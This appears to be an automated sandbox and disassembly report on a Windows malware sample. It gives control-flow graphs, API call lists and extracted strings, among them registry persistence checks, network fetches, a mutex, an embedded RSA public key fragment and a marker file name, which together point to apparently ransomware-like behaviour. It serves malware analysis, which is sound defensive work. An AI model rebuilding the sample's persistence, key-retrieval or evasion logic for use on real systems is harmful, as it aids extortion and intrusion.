41493->41494 41495 e3bf28 41493->41495 41494->41495 41496 e3bf1a DestroyWindow 41494->41496 41495->41474 41496->41495 41497 e3bef7 41497->41493 41497->41495 41499 e3c330 59 API calls 41499->41504 41500 e3c240 59 API calls 41500->41504 41501 e3b8b0 59 API calls 41501->41504 41502 e34690 59 API calls 41502->41504 41504->41493 41504->41497 41504->41499 41504->41500 41504->41501 41504->41502 41505 e3be8f CreateThread 41504->41505 41507 e2eff0 65 API calls 41504->41507 41508 e3ce80 59 API calls _memmove 41504->41508 41505->41504 41506->41491 41507->41504 41508->41504 41509 e74c30 41511 e40c62 58 API calls 41509->41511 41510 e74c3a 41511->41510 41512 ea1920 41513 e4f7c0 __ftell_nolock 41512->41513 41514 ea1943 GetVersionExA LoadLibraryA LoadLibraryA LoadLibraryA 41513->41514 41515 ea1a0b 41514->41515 41516 ea19e2 GetProcAddress GetProcAddress 41514->41516 41517 ea1aab 41515->41517 41520 ea1a1b NetStatisticsGet 41515->41520 41516->41515 41518 ea1acb 41517->41518 41519 ea1ac4 FreeLibrary 41517->41519 41521 ea1ad5 GetProcAddress GetProcAddress GetProcAddress 41518->41521 41548 ea1b0d __ftell_nolock 41518->41548 41519->41518 41522 ea1a69 NetStatisticsGet 41520->41522 41523 ea1a33 __ftell_nolock 41520->41523 41521->41548 41522->41517 41524 ea1a87 __ftell_nolock 41522->41524 41528 e7d550 101 API calls 41523->41528 41529 e7d550 101 API calls 41524->41529 41525 ea1bee 41526 ea1c1b 41525->41526 41527 ea1c14 FreeLibrary 41525->41527 41530 ea1c31 LoadLibraryA 41526->41530 41531 ea1c24 41526->41531 41527->41526 41532 ea1a5a 41528->41532 41529->41517 41534 ea1c4a GetProcAddress GetProcAddress GetProcAddress 41530->41534 41535 ea1d4b 41530->41535 41612 e749a0 13 API calls 4 library calls 41531->41612 41532->41522 41545 ea1c84 __ftell_nolock 41534->41545 41554 ea1cac __ftell_nolock 41534->41554 41537 ea1d59 12 API calls 41535->41537 41538 ea223f 41535->41538 41536 ea1c29 41536->41530 41536->41535 41540 ea1e5c 41537->41540 41541 ea2233 FreeLibrary 41537->41541 41600 ea2470 41538->41600 41540->41541 41561 ea1ed9 CreateToolhelp32Snapshot 41540->41561 41541->41538 41543 ea1d3f FreeLibrary 41543->41535 41544 ea225b __ftell_nolock 41546 e7d550 101 API calls 41544->41546 41547 e7d550 101 API calls 41545->41547 41550 ea2276 GetCurrentProcessId 41546->41550 41547->41554 41548->41525 41552 e7d550 101 API calls 41548->41552 41557 ea1b7c __ftell_nolock 41548->41557 41549 ea1d03 __ftell_nolock 41549->41543 41553 e7d550 101 API calls 41549->41553 41551 ea228f __ftell_nolock 41550->41551 41558 e7d550 101 API calls 41551->41558 41552->41557 41555 ea1d3c 41553->41555 41554->41549 41556 e7d550 101 API calls 41554->41556 41555->41543 41556->41549 41557->41525 41559 e7d550 101 API calls 41557->41559 41560 ea22aa 41558->41560 41559->41525 41562 e4a77e __strtod_l 6 API calls 41560->41562 41561->41541 41563 ea1ef0 41561->41563 41564 ea22ca 41562->41564 41565 ea1f03 GetTickCount 41563->41565 41566 ea1f15 Heap32ListFirst 41563->41566 41565->41566 41567 ea2081 41566->41567 41572 ea1f28 __ftell_nolock 41566->41572 41568 ea209d Process32First 41567->41568 41569 ea2095 GetTickCount 41567->41569 41570 ea210a 41568->41570 41577 ea20b4 __ftell_nolock 41568->41577 41569->41568 41571 ea2118 GetTickCount 41570->41571 41578 ea2120 __ftell_nolock 41570->41578 41571->41578 41572->41567 41580 ea204e Heap32ListNext 41572->41580 41581 ea2066 GetTickCount 41572->41581 41584 e7d550 101 API calls 41572->41584 41591 ea1ff1 GetTickCount 41572->41591 41594 e7d550 41572->41594 41574 ea1f56 Heap32First 41574->41572 41575 e7d550 101 API calls 41575->41577 41576 ea2196 41579 ea21a4 GetTickCount 41576->41579 41589 ea21ac __ftell_nolock 41576->41589 41577->41570 41577->41575 41585 ea20fb GetTickCount 41577->41585 41578->41576 41583 e7d550 101 API calls 41578->41583 41592 ea2187 GetTickCount 41578->41592 41579->41589 41580->41567 41580->41572 41581->41567 41581->41572 41582 ea2219 41587 ea2229 41582->41587 41588 ea222d CloseHandle 41582->41588 41583->41578 41586 ea1fd9 Heap32Next 41584->41586 41585->41570 41585->41577 41586->41572 41587->41541 41588->41541 41589->41582 41590 e7d550 101 API calls 41589->41590 41593 ea220a GetTickCount 41589->41593 41590->41589 41591->41572 41592->41576 41592->41578 41593->41582 41593->41589 41595 e7d559 41594->41595 41597 e7d57d __ftell_nolock 41594->41597 41613 e8b5d0 101 API calls __except_handler4 41595->41613 41597->41574 41598 e7d55f 41598->41597 41614 e7a5e0 101 API calls __except_handler4 41598->41614 41601 ea247a __ftell_nolock 41600->41601 41602 ea24c3 GetTickCount 41601->41602 41603 ea2483 QueryPerformanceCounter 41601->41603 41606 ea24d6 __ftell_nolock 41602->41606 41604 ea2492 41603->41604 41605 ea2499 __ftell_nolock 41603->41605 41604->41602 41608 e7d550 101 API calls 41605->41608 41607 e7d550 101 API calls 41606->41607 41609 ea24ea 41607->41609 41610 ea24b7 41608->41610 41611 ea2244 GlobalMemoryStatus 41609->41611 41610->41602 41610->41611 41611->41544 41612->41536 41613->41598 41614->41597
                                                                                                  APIs
                                                                                                    • Part of subcall function 00E2CF10: _memset.LIBCMT ref: 00E2CF4A
                                                                                                    • Part of subcall function 00E2CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00E2CF5F
                                                                                                    • Part of subcall function 00E2CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00E2CFA6
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00E39FC4
                                                                                                  • GetLastError.KERNEL32 ref: 00E39FD2
                                                                                                  • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00E39FDA
                                                                                                  • GetLastError.KERNEL32 ref: 00E39FE4
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,00993A10,?), ref: 00E3A0BB
                                                                                                  • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E3A0C2
                                                                                                  • GetCommandLineW.KERNEL32(?,?), ref: 00E3A161
                                                                                                    • Part of subcall function 00E324E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 00E324FE
                                                                                                    • Part of subcall function 00E324E0: GetLastError.KERNEL32 ref: 00E32509
                                                                                                    • Part of subcall function 00E324E0: CloseHandle.KERNEL32 ref: 00E3251C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                  • String ID: IsNotAutoStart$ IsNotTask$%username%$-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$list<T> too long${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                  • API String ID: 2957410896-3615023204
                                                                                                  • Opcode ID: f44ab8b150156c0c196e35b0bfe4939ec03bd3ad7935840d41aa3fc0a3492727
                                                                                                  • Instruction ID: 4947ae877474b9dbd2e190fc639f3146de039f8f55d91f24c3d7fea250abe445
                                                                                                  • Opcode Fuzzy Hash: f44ab8b150156c0c196e35b0bfe4939ec03bd3ad7935840d41aa3fc0a3492727
                                                                                                  • Instruction Fuzzy Hash: 87D2C2716043419FD714EF20D889B9BBBE5BF84304F04192CF586A7292DB75EA49CB93
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 606 ea1920-ea19e0 call e4f7c0 GetVersionExA LoadLibraryA * 3 609 ea1a0b-ea1a0d 606->609 610 ea19e2-ea1a05 GetProcAddress * 2 606->610 611 ea1aba-ea1ac2 609->611 612 ea1a13-ea1a15 609->612 610->609 613 ea1acb-ea1ad3 611->613 614 ea1ac4-ea1ac5 FreeLibrary 611->614 612->611 615 ea1a1b-ea1a31 NetStatisticsGet 612->615 616 ea1b0d 613->616 617 ea1ad5-ea1b0b GetProcAddress * 3 613->617 614->613 618 ea1a69-ea1a85 NetStatisticsGet 615->618 619 ea1a33-ea1a5d call e4f7c0 call e7d550 615->619 620 ea1b0f-ea1b17 616->620 617->620 618->611 622 ea1a87-ea1aae call e4f7c0 call e7d550 618->622 619->618 625 ea1c0a-ea1c12 620->625 626 ea1b1d-ea1b23 620->626 622->611 628 ea1c1b-ea1c22 625->628 629 ea1c14-ea1c15 FreeLibrary 625->629 626->625 631 ea1b29-ea1b2b 626->631 633 ea1c31-ea1c44 LoadLibraryA 628->633 634 ea1c24-ea1c2b call e749a0 628->634 629->628 631->625 636 ea1b31-ea1b47 631->636 639 ea1c4a-ea1c82 GetProcAddress * 3 633->639 640 ea1d4b-ea1d53 633->640 634->633 634->640 648 ea1b98-ea1baa 636->648 649 ea1b49-ea1b5d 636->649 644 ea1caf-ea1cb7 639->644 645 ea1c84 639->645 642 ea1d59-ea1e56 GetProcAddress * 12 640->642 643 ea223f-ea2256 call ea2470 GlobalMemoryStatus call e4f7c0 640->643 652 ea1e5c-ea1e63 642->652 653 ea2233-ea2239 FreeLibrary 642->653 668 ea225b-ea22cd call e7d550 GetCurrentProcessId call e4f7c0 call e7d550 call e4a77e 643->668 650 ea1cb9-ea1cc0 644->650 651 ea1d06-ea1d08 644->651 655 ea1c86-ea1cac call e4f7c0 call e7d550 645->655 665 ea1bb2-ea1bb4 648->665 670 ea1b8a-ea1b8c 649->670 671 ea1b5f-ea1b84 call e4f7c0 call e7d550 649->671 658 ea1ccb-ea1ccd 650->658 659 ea1cc2-ea1cc9 650->659 656 ea1d0a-ea1d3c call e4f7c0 call e7d550 651->656 657 ea1d3f-ea1d45 FreeLibrary 651->657 652->653 660 ea1e69-ea1e70 652->660 653->643 655->644 656->657 657->640 658->651 664 ea1ccf-ea1cde 658->664 659->651 659->658 660->653 666 ea1e76-ea1e7d 660->666 664->651 685 ea1ce0-ea1d03 call e4f7c0 call e7d550 664->685 665->625 673 ea1bb6-ea1bca 665->673 666->653 667 ea1e83-ea1e8a 666->667 667->653 674 ea1e90-ea1e97 667->674 670->648 671->670 687 ea1bfc-ea1bfe 673->687 688 ea1bcc-ea1bf6 call e4f7c0 call e7d550 673->688 674->653 680 ea1e9d-ea1ea4 674->680 680->653 689 ea1eaa-ea1eb1 680->689 685->651 687->625 688->687 689->653 695 ea1eb7-ea1ebe 689->695 695->653 702 ea1ec4-ea1ecb 695->702 702->653 706 ea1ed1-ea1ed3 702->706 706->653 709 ea1ed9-ea1eea CreateToolhelp32Snapshot 706->709 709->653 711 ea1ef0-ea1f01 709->711 713 ea1f03-ea1f0f GetTickCount 711->713 714 ea1f15-ea1f22 Heap32ListFirst 711->714 713->714 715 ea1f28-ea1f2d 714->715 716 ea2081-ea2093 714->716 719 ea1f33-ea1f9d call e4f7c0 call e7d550 Heap32First 715->719 717 ea209d-ea20b2 Process32First 716->717 718 ea2095-ea2097 GetTickCount 716->718 720 ea210a-ea2116 717->720 721 ea20b4-ea20f5 call e4f7c0 call e7d550 717->721 718->717 734 ea1f9f-ea1faa 719->734 735 ea2015-ea2060 Heap32ListNext 719->735 724 ea2118-ea211a GetTickCount 720->724 725 ea2120-ea2135 720->725 721->720 748 ea20f7-ea20f9 721->748 724->725 732 ea2196-ea21a2 725->732 733 ea2137 725->733 739 ea21ac-ea21c1 732->739 740 ea21a4-ea21a6 GetTickCount 732->740 737 ea2140-ea2181 call e4f7c0 call e7d550 733->737 738 ea1fb0-ea1feb call e4f7c0 call e7d550 Heap32Next 734->738 735->716 745 ea2062-ea2064 735->745 737->732 771 ea2183-ea2185 737->771 763 ea200f 738->763 764 ea1fed-ea1fef 738->764 752 ea2219-ea2227 739->752 753 ea21c3-ea2204 call e4f7c0 call e7d550 739->753 740->739 749 ea2079-ea207b 745->749 750 ea2066-ea2077 GetTickCount 745->750 748->721 756 ea20fb-ea2108 GetTickCount 748->756 749->716 749->719 750->716 750->749 760 ea2229-ea222b 752->760 761 ea222d CloseHandle 752->761 753->752 774 ea2206-ea2208 753->774 756->720 756->721 760->653 761->653 763->735 767 ea1ff1-ea2002 GetTickCount 764->767 768 ea2004-ea200d 764->768 767->763 767->768 768->738 768->763 771->737 772 ea2187-ea2194 GetTickCount 771->772 772->732 772->737 774->753 775 ea220a-ea2217 GetTickCount 774->775 775->752 775->753
                                                                                                  APIs
                                                                                                  • GetVersionExA.KERNEL32(00000094), ref: 00EA1983
                                                                                                  • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00EA1994
                                                                                                  • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 00EA19A1
                                                                                                  • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 00EA19AE
                                                                                                  • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 00EA19E8
                                                                                                  • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 00EA19FB
                                                                                                  • NetStatisticsGet.NETAPI32(00000000,LanmanWorkstation,00000000,00000000,?), ref: 00EA1A2D
                                                                                                  • NetStatisticsGet.NETAPI32(00000000,LanmanServer,00000000,00000000,?), ref: 00EA1A81
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00EA1AC5
                                                                                                  • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00EA1ADB
                                                                                                  • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00EA1AEE
                                                                                                  • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00EA1B01
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00EA1C15
                                                                                                  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00EA1C36
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00EA1C50
                                                                                                  • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00EA1C63
                                                                                                  • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00EA1C76
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00EA1D45
                                                                                                  • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00EA1D73
                                                                                                  • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00EA1D86
                                                                                                  • GetProcAddress.KERNEL32(?,Heap32First), ref: 00EA1D99
                                                                                                  • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00EA1DAC
                                                                                                  • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00EA1DBF
                                                                                                  • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00EA1DD2
                                                                                                  • GetProcAddress.KERNEL32(?,Process32First), ref: 00EA1DE5
                                                                                                  • GetProcAddress.KERNEL32(?,Process32Next), ref: 00EA1DF8
                                                                                                  • GetProcAddress.KERNEL32(?,Thread32First), ref: 00EA1E0B
                                                                                                  • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00EA1E1E
                                                                                                  • GetProcAddress.KERNEL32(?,Module32First), ref: 00EA1E31
                                                                                                  • GetProcAddress.KERNEL32(?,Module32Next), ref: 00EA1E44
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00EA1EDD
                                                                                                  • GetTickCount.KERNEL32 ref: 00EA1F03
                                                                                                  • Heap32ListFirst.KERNEL32(00000000,00000010), ref: 00EA1F1A
                                                                                                  • Heap32First.KERNEL32(00000024,?,?), ref: 00EA1F95
                                                                                                  • Heap32Next.KERNEL32(?,?,?,?,?,F033F41C), ref: 00EA1FE3
                                                                                                  • GetTickCount.KERNEL32 ref: 00EA1FF1
                                                                                                  • Heap32ListNext.KERNEL32(?,?), ref: 00EA2058
                                                                                                  • GetTickCount.KERNEL32 ref: 00EA2066
                                                                                                  • GetTickCount.KERNEL32 ref: 00EA2095
                                                                                                  • Process32First.KERNEL32(?,00000128), ref: 00EA20AA
                                                                                                  • GetTickCount.KERNEL32 ref: 00EA20FB
                                                                                                  • GetTickCount.KERNEL32 ref: 00EA2118
                                                                                                  • GetTickCount.KERNEL32 ref: 00EA2187
                                                                                                  • GetTickCount.KERNEL32 ref: 00EA21A4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$CountTick$Library$Heap32Load$FirstFree$ListNextStatistics$CreateProcess32SnapshotToolhelp32Version
                                                                                                  • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                                                                                  • API String ID: 4174345323-1723836103
                                                                                                  • Opcode ID: 2e0b0d31052f11c06c493e0c703c5d13ac588753ec24d534ff2d89ca23684b5b
                                                                                                  • Instruction ID: 08564bd20ecf2d45a46976b1a18b1c56db322c514e2ebf1d9081fc9da135fff3
                                                                                                  • Opcode Fuzzy Hash: 2e0b0d31052f11c06c493e0c703c5d13ac588753ec24d534ff2d89ca23684b5b
                                                                                                  • Instruction Fuzzy Hash: 6C324DB0E002299BDB219F68CC45B9EB6B9FF45704F0051EAE60CFA191EB709E84DF55
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 776 e3e690-e3e6d8 call e4f7c0 timeGetTime call e43f74 call e2c6a0 783 e3e6e0-e3e6e6 776->783 784 e3e6f0-e3e722 call e4b420 call e2c500 783->784 789 e3e724-e3e729 784->789 790 e3e72e-e3e772 InternetOpenW 784->790 793 e3ea1f-e3ea40 call e43cf0 789->793 791 e3e774-e3e776 790->791 792 e3e778-e3e77d 790->792 794 e3e78f-e3e7b8 call e35ae0 call e41c02 791->794 795 e3e780-e3e789 792->795 801 e3ea42-e3ea46 793->801 802 e3ea8d-e3eacc lstrlenA lstrcpyA * 2 lstrlenA 793->802 816 e3e882-e3e8e5 call e35ae0 call e33ff0 call e32900 call e359d0 794->816 817 e3e7be-e3e7f7 call e34690 call e2dd40 794->817 795->795 797 e3e78b-e3e78d 795->797 797->794 806 e3ee2a call e31b10 801->806 807 e3ea4c-e3ea61 SHGetFolderPathA 801->807 803 e3eaef-e3eb12 802->803 804 e3eace 802->804 811 e3eb14-e3eb16 803->811 812 e3eb18-e3eb1f 803->812 808 e3ead0-e3ead8 804->808 818 e3ee2f-e3ee3a 806->818 807->784 813 e3ea67-e3ea88 PathAppendA DeleteFileA 807->813 814 e3eaeb 808->814 815 e3eada-e3eae7 lstrlenA 808->815 819 e3eb2b-e3eb4f call e356d0 call e32900 811->819 820 e3eb22-e3eb27 812->820 813->784 814->803 815->808 822 e3eae9 815->822 873 e3e8f3-e3e917 lstrcpyW 816->873 874 e3e8e7-e3e8f0 call e42587 816->874 845 e3e7f9-e3e7fe 817->845 846 e3e86f-e3e874 817->846 824 e3ee4d-e3ee82 call e2ef50 818->824 825 e3ee3c-e3ee3f 818->825 843 e3eb53-e3eb66 lstrcpyW 819->843 844 e3eb51 819->844 820->820 827 e3eb29 820->827 822->803 836 e3ee86-e3ee8c 824->836 825->783 827->819 840 e3ee92-e3ee94 836->840 841 e3ee8e-e3ee90 836->841 849 e3ee97-e3ee9c 840->849 847 e3eea0-e3eeaf call e33ea0 841->847 850 e3eb74-e3ebe4 lstrlenA call e40c62 call e4b420 MultiByteToWideChar lstrcpyW call e43cf0 843->850 851 e3eb68-e3eb71 call e42587 843->851 844->843 853 e3e800-e3e809 call e42587 845->853 854 e3e80c-e3e827 845->854 846->816 852 e3e876-e3e87f call e42587 846->852 847->836 875 e3eeb1-e3eee3 call e2ef50 847->875 849->849 859 e3ee9e 849->859 896 e3ebe6-e3ebea 850->896 897 e3ec3d-e3ec97 lstrlenW lstrlenA lstrcpyA * 2 lstrlenA 850->897 851->850 852->816 853->854 856 e3e842-e3e848 854->856 857 e3e829-e3e82d 854->857 866 e3e84e-e3e86c 856->866 865 e3e82f-e3e840 call e405a0 857->865 857->866 859->847 865->866 866->846 879 e3e943-e3e97a InternetOpenUrlW InternetReadFile 873->879 880 e3e919-e3e920 873->880 874->873 894 e3eee7-e3eeed 875->894 883 e3e9ec-e3ea08 InternetCloseHandle * 2 879->883 884 e3e97c-e3e994 SHGetFolderPathA 879->884 880->879 886 e3e922-e3e92e 880->886 890 e3ea16-e3ea19 883->890 891 e3ea0a-e3ea13 call e42587 883->891 884->883 889 e3e996-e3e9c2 PathAppendA call e420b6 884->889 892 e3e930-e3e935 886->892 893 e3e937 886->893 889->883 913 e3e9c4-e3e9e4 lstrlenA call e42b02 call e43a38 889->913 890->793 891->890 900 e3e93c-e3e93d lstrcatW 892->900 893->900 901 e3eef3-e3eef5 894->901 902 e3eeef-e3eef1 894->902 896->806 903 e3ebf0-e3ec11 SHGetFolderPathA 896->903 905 e3ec99 897->905 906 e3ecbf-e3ecdd 897->906 900->879 909 e3eef8-e3eefd 901->909 908 e3ef01-e3ef10 call e33ea0 902->908 903->784 911 e3ec17-e3ec38 PathAppendA DeleteFileA 903->911 914 e3eca0-e3eca8 905->914 915 e3ece3-e3eced 906->915 916 e3ecdf-e3ece1 906->916 908->894 923 e3ef12-e3ef4c call e33ff0 call e32900 908->923 909->909 910 e3eeff 909->910 910->908 911->783 933 e3e9e9 913->933 919 e3ecbb 914->919 920 e3ecaa-e3ecb7 lstrlenA 914->920 922 e3ecf0-e3ecf5 915->922 921 e3ecf9-e3ed1b call e356d0 call e32900 916->921 919->906 920->914 925 e3ecb9 920->925 936 e3ed1f-e3ed35 lstrcpyW 921->936 937 e3ed1d 921->937 922->922 926 e3ecf7 922->926 941 e3ef50-e3ef68 lstrcpyW 923->941 942 e3ef4e 923->942 925->906 926->921 933->883 939 e3ed43-e3edab lstrlenA call e40c62 call e4b420 MultiByteToWideChar lstrcpyW lstrlenW 936->939 940 e3ed37-e3ed40 call e42587 936->940 937->936 957 e3edad-e3edb6 lstrlenW 939->957 958 e3edbc-e3edc1 939->958 940->939 945 e3ef76-e3efb3 call e33ff0 call e32900 941->945 946 e3ef6a-e3ef73 call e42587 941->946 942->941 959 e3efb7-e3efc6 lstrcpyW 945->959 960 e3efb5 945->960 946->945 957->958 961 e3ee44-e3ee48 957->961 962 e3edc3-e3ede4 SHGetFolderPathA 958->962 963 e3ee10-e3ee12 958->963 967 e3efd4-e3efe0 959->967 968 e3efc8-e3efd1 call e42587 959->968 960->959 969 e3f01a-e3f030 961->969 962->784 964 e3edea-e3ee0b PathAppendA DeleteFileA 962->964 965 e3ee14-e3ee1a call e40bed 963->965 966 e3ee1d-e3ee1f 963->966 964->783 965->966 966->806 971 e3ee21-e3ee27 call e40bed 966->971 973 e3efe2-e3efeb call e42587 967->973 974 e3efee-e3f008 967->974 968->967 971->806 973->974 979 e3f016 974->979 980 e3f00a-e3f013 call e42587 974->980 979->969 980->979
                                                                                                  APIs
                                                                                                  • timeGetTime.WINMM(?,?,?,?,?,00EEB3EC,000000FF), ref: 00E3E6C0
                                                                                                    • Part of subcall function 00E2C6A0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,00E3E6D4), ref: 00E2C6C2
                                                                                                    • Part of subcall function 00E2C6A0: RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 00E2C6F3
                                                                                                    • Part of subcall function 00E2C6A0: RegCloseKey.ADVAPI32(00000000), ref: 00E2C700
                                                                                                  • _memset.LIBCMT ref: 00E3E707
                                                                                                    • Part of subcall function 00E2C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 00E2C51B
                                                                                                  • InternetOpenW.WININET ref: 00E3E743
                                                                                                  • _wcsstr.LIBCMT ref: 00E3E7AE
                                                                                                  • _memmove.LIBCMT ref: 00E3E838
                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 00E3E90A
                                                                                                  • lstrcatW.KERNEL32(?,&first=false), ref: 00E3E93D
                                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00E3E954
                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00E3E96F
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E3E98C
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E3E9A3
                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 00E3E9CD
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00E3E9F3
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00E3E9F6
                                                                                                  • _strstr.LIBCMT ref: 00E3EA36
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E3EA59
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E3EA74
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 00E3EA82
                                                                                                  • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 00E3EA92
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 00E3EAA4
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 00E3EABA
                                                                                                  • lstrlenA.KERNEL32(?), ref: 00E3EAC8
                                                                                                  • lstrlenA.KERNEL32(00000022), ref: 00E3EAE3
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 00E3EB5B
                                                                                                  • lstrlenA.KERNEL32(?), ref: 00E3EB7C
                                                                                                  • _malloc.LIBCMT ref: 00E3EB86
                                                                                                  • _memset.LIBCMT ref: 00E3EB94
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 00E3EBAE
